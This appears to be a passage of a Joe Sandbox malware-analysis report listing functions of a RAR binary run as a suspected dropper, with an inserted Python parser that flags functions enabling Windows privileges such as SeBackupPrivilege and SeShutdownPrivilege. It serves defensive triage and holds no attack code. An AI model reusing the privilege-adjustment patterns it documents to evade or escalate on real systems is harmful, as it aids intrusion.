                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2827264287-3508440684
                                                            • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                            • Instruction ID: 2b58673a4a9e39686c389d0975f335c3d48a6f981125a8c4fd61571ed47e771b
                                                            • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                            • Instruction Fuzzy Hash: 5AD1C236A1CA8685EB20EF24D8502F9A3A0FB447A8F904135DA6D476D5FF3CD50ECB20
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAEE9
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF01
                                                            • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF19
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAF75
                                                            • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FAFB0
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB23B
                                                            • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB244
                                                            • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF71D2B2E4C), ref: 00007FF71D2FB287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                            • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                            • API String ID: 3483800833-4165214152
                                                            • Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                            • Instruction ID: 1a2218251afdd7fbbed5a62d8163886f9ed6d097ea730f2d1eb4e738933e1764
                                                            • Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                            • Instruction Fuzzy Hash: 0BC15F32A0DE8285EB14EF21D8502EEA7A0FF85BA4F844435DA5E47B95EF3CD549CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 3729174658-3733053543
                                                            • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                            • Instruction ID: 5e6e35e4cb28782ad9dcff56e864a78d4be43c26ee92d04bdcf2e38b1ddf55a7
                                                            • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                            • Instruction Fuzzy Hash: 6B218132E1CE5282F790AB20E4553BAF261EB84764FD09039D95E06954EF3DD44D8F20
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE298
                                                            • FindClose.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE2AB
                                                            • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE2F7
                                                              • Part of subcall function 00007FF71D2CEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF73
                                                              • Part of subcall function 00007FF71D2CEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF71D2CEE47), ref: 00007FF71D2CEF84
                                                              • Part of subcall function 00007FF71D2CEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF71D2CEFA7
                                                              • Part of subcall function 00007FF71D2CEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF71D2CEFCA
                                                              • Part of subcall function 00007FF71D2CEF50: GetLastError.KERNEL32 ref: 00007FF71D2CEFD4
                                                              • Part of subcall function 00007FF71D2CEF50: CloseHandle.KERNEL32 ref: 00007FF71D2CEFE7
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2CE357
                                                            • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeBackupPrivilege
                                                            • API String ID: 3094086963-2429070247
                                                            • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                            • Instruction ID: 2f74da3abde9736c0bd4614a57b1e0d19d7675026c3e46521cca0e7f5e74c020
                                                            • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                            • Instruction Fuzzy Hash: 16619432A1CA8186E724AB15E4452F9E360FB447B4FC04239DB6E17AD4EF3CE559CB20
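The row above is the one worth reading closely in this part of the listing: the function at 00007FF71D2CE298 enumerates a path with FindFirstFileW, opens it with CreateFileW, enables SeBackupPrivilege through a subcall (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges) and then issues a DeviceIoControl on the handle, while the row before it does the same token dance for SeShutdownPrivilege. Pulling those facts out of a few thousand lines of plugin output is tedious by eye, so the following Python parser is added here as an example; it is not Joe Sandbox, IDA or WinRAR code. It assumes the layout used on this page (each function row begins at an "APIs" header, bullets under it are call sites, bullets under "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" are "key: value" pairs) and uses a heuristic of its own to decide that a function enables a privilege: both LookupPrivilegeValueW and AdjustTokenPrivileges appear in its call list, or, when the per-call list is empty, the word "Privilege" appears in the API ID summary; the result is then paired with the Se*Privilege string IDs. The sample input is constructed from trimmed rows of this page.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three function rows in the layout of this page's listing
# (values trimmed from the page; not a file produced by Joe Sandbox itself).
SAMPLE = """
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE298
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE2F7
  • Part of subcall function 00007FF71D2CEF50: OpenProcessToken.ADVAPI32(?,?), ref: 00007FF71D2CEF84
  • Part of subcall function 00007FF71D2CEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF71D2CEFA7
  • Part of subcall function 00007FF71D2CEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF71D2CEFCA
• DeviceIoControl.KERNEL32 ref: 00007FF71D2CE357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF71D2B2014), ref: 00007FF71D2CE362
Strings
Memory Dump Source
• Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
Similarity
• API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
• String ID: SeBackupPrivilege
• Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
APIs
Strings
Memory Dump Source
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
APIs
Strings
Memory Dump Source
Similarity
• API ID: Sleepswprintf
• String ID: $%ls%0*u.rev
• Opcode ID: e3b4538fc488e6fa3eae94769406cf09f50ae20544565ed87ad815caa45bc0f7
"""

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address
    subcall_of: str | None = None     # callee address when the line is "Part of subcall function"

@dataclass
class FunctionRow:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # "API ID", "String ID", "Opcode ID", ...

    @property
    def api_names(self) -> set[str]:
        return {c.name for c in self.apis}

    @property
    def string_ids(self) -> list[str]:
        # String IDs are '$'-joined; a leading '$' (as in "$%ls%0*u.rev") yields an empty piece
        return [s for s in self.fields.get("String ID", "").split("$") if s]

_API_RE = re.compile(
    r"^[•*-]\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
_FIELD_RE = re.compile(r"^[•*-]\s*([^:]+):\s*(.*)$")
_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_listing(text: str) -> list[FunctionRow]:
    """Split the listing into function rows. Assumption: a row starts at each 'APIs' header."""
    rows: list[FunctionRow] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rows.append(FunctionRow())
        if line in _HEADERS:
            section = line
            continue
        if not rows:
            continue                     # material before the first row
        row = rows[-1]
        if section == "APIs":
            m = _API_RE.match(line)
            if m:
                sub, name, module, ref = m.groups()
                row.apis.append(ApiCall(name, module, ref, sub))
        elif section != "Strings":
            m = _FIELD_RE.match(line)
            if m:                        # repeated keys (e.g. 'Associated') overwrite; fine for triage
                row.fields[m.group(1).strip()] = m.group(2).strip()
    return rows

_ADJUST = {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}

def enabled_privileges(row: FunctionRow) -> list[str]:
    """Se*Privilege names the function enables. Heuristic (assumption, not a Joe Sandbox rule):
    both token calls in the call list, or 'Privilege' in the API ID summary when the list is empty."""
    adjusts = _ADJUST <= row.api_names or (
        not row.apis and "Privilege" in row.fields.get("API ID", ""))
    if not adjusts:
        return []
    return [s for s in row.string_ids if s.startswith("Se") and s.endswith("Privilege")]

def triage(text: str) -> dict[str, list[str]]:
    """Opcode ID -> privileges enabled, for every row that enables at least one."""
    result: dict[str, list[str]] = {}
    for row in parse_listing(text):
        privs = enabled_privileges(row)
        if privs:
            result[row.fields.get("Opcode ID", "?")] = privs
    return result

if __name__ == "__main__":
    for opcode_id, privs in triage(SAMPLE).items():
        print(opcode_id[:16], privs)
```

Run it against a saved copy of the full listing instead of `SAMPLE` and the output is a short map from Opcode ID to privilege names; the `.rev` row is correctly left out because nothing in it touches a token. The Opcode ID keys are stable across reports for the same code, so the map doubles as a quick check that a later sample of the dropper still carries the same RAR build.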
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Sleepswprintf
                                                            • String ID: $%ls%0*u.rev
                                                            • API String ID: 407366315-3491873314
                                                            • Opcode ID: e3b4538fc488e6fa3eae94769406cf09f50ae20544565ed87ad815caa45bc0f7
                                                            • Instruction ID: 7e7b98179d98600a0ca7e10996f2f2a9757670c827bd6ddd5037b4953c700906
                                                            • Opcode Fuzzy Hash: e3b4538fc488e6fa3eae94769406cf09f50ae20544565ed87ad815caa45bc0f7
                                                            • Instruction Fuzzy Hash: 81020832A0CA9286EB20FF15D4542ADF3A5FB887A4F810135DE6D57795EE3CE449CB20
                                                            APIs
                                                            • new.LIBCMT ref: 00007FF71D2B4BD8
                                                              • Part of subcall function 00007FF71D2FB6D0: Sleep.KERNEL32(?,?,?,?,00007FF71D2CCBED,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2FB730
                                                              • Part of subcall function 00007FF71D2D1E80: CreateFileW.KERNELBASE ref: 00007FF71D2D1F4A
                                                              • Part of subcall function 00007FF71D2D1E80: GetLastError.KERNEL32 ref: 00007FF71D2D1F59
                                                              • Part of subcall function 00007FF71D2D1E80: CreateFileW.KERNELBASE ref: 00007FF71D2D1F99
                                                              • Part of subcall function 00007FF71D2D1E80: GetLastError.KERNEL32 ref: 00007FF71D2D1FA2
                                                              • Part of subcall function 00007FF71D2D1E80: SetFileTime.KERNEL32 ref: 00007FF71D2D1FF1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$SleepTime
                                                            • String ID: %12s %s$%12s %s$ $%s
                                                            • API String ID: 2965465231-221484280
                                                            • Opcode ID: 205973a013b23f23469f2857c4eaa0cafb1c0791afa8c1efee3731e28bb9fad9
                                                            • Instruction ID: 9b09a972e36586208794350009f9412976a745877516b6a1b717962fe6781826
                                                            • Opcode Fuzzy Hash: 205973a013b23f23469f2857c4eaa0cafb1c0791afa8c1efee3731e28bb9fad9
                                                            • Instruction Fuzzy Hash: D8F1B222B0DE4285EB60EB11D0902BEE751FB48BA8FC44435DA5D07785EFBCD65ACB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                            • Instruction ID: 9b63bf34a8642a4f8cc2e0b614a5d0c27111c790a9266ee7fe727916a1aa12b3
                                                            • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                            • Instruction Fuzzy Hash: 2D314136618F81C6DB60DF25E8402AEF3A5FB84764F940139EA9D43B55EF38D159CB10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3398352648-0
                                                            • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                            • Instruction ID: 03e52fd1b17eb2ac5f3555ced7731b02c26694963659877a1c4a3e709ff9611c
                                                            • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                            • Instruction Fuzzy Hash: 2F113032A1CB4186E750AF61F44056AF7A5FB88B90F944539EA8E43A28EF3CD44DCF50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 3116915952-0
                                                            • Opcode ID: 182d738b03a18d4550a6de197fa6bd4041aa5ae2408643a047cd3678e056e4d0
                                                            • Instruction ID: a47a6110ce7fb2f2235f6ef73dd6d9c557b998d1cabf461b4779d6e5757782f4
                                                            • Opcode Fuzzy Hash: 182d738b03a18d4550a6de197fa6bd4041aa5ae2408643a047cd3678e056e4d0
                                                            • Instruction Fuzzy Hash: 46E17722A1CE8685EA20FB25D4501FDA361FF897A4F945032DE5D07796EE7CD60ACB20
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3AC4
                                                            • CreateFileW.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3B0A
                                                            • DeviceIoControl.KERNEL32 ref: 00007FF71D2D3B55
                                                            • CloseHandle.KERNEL32(?,?,?,00007FF71D2D11B0,?,?,?,00000000,?,?,00007FF71D2CF30F,00000000,00007FF71D2B6380,?,00007FF71D2B2EC8), ref: 00007FF71D2D3B60
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$CloseControlDeviceHandle
                                                            • String ID:
                                                            • API String ID: 998109204-0
                                                            • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                            • Instruction ID: 5d3b287e4493831462a299b8443226114bf726c60055acc31d3986cca481fbc4
                                                            • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                            • Instruction Fuzzy Hash: 1D318032A18E8186E6609F11F44469AF7A4FB887F4F404235EAA913BD4EF3CC5598F10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
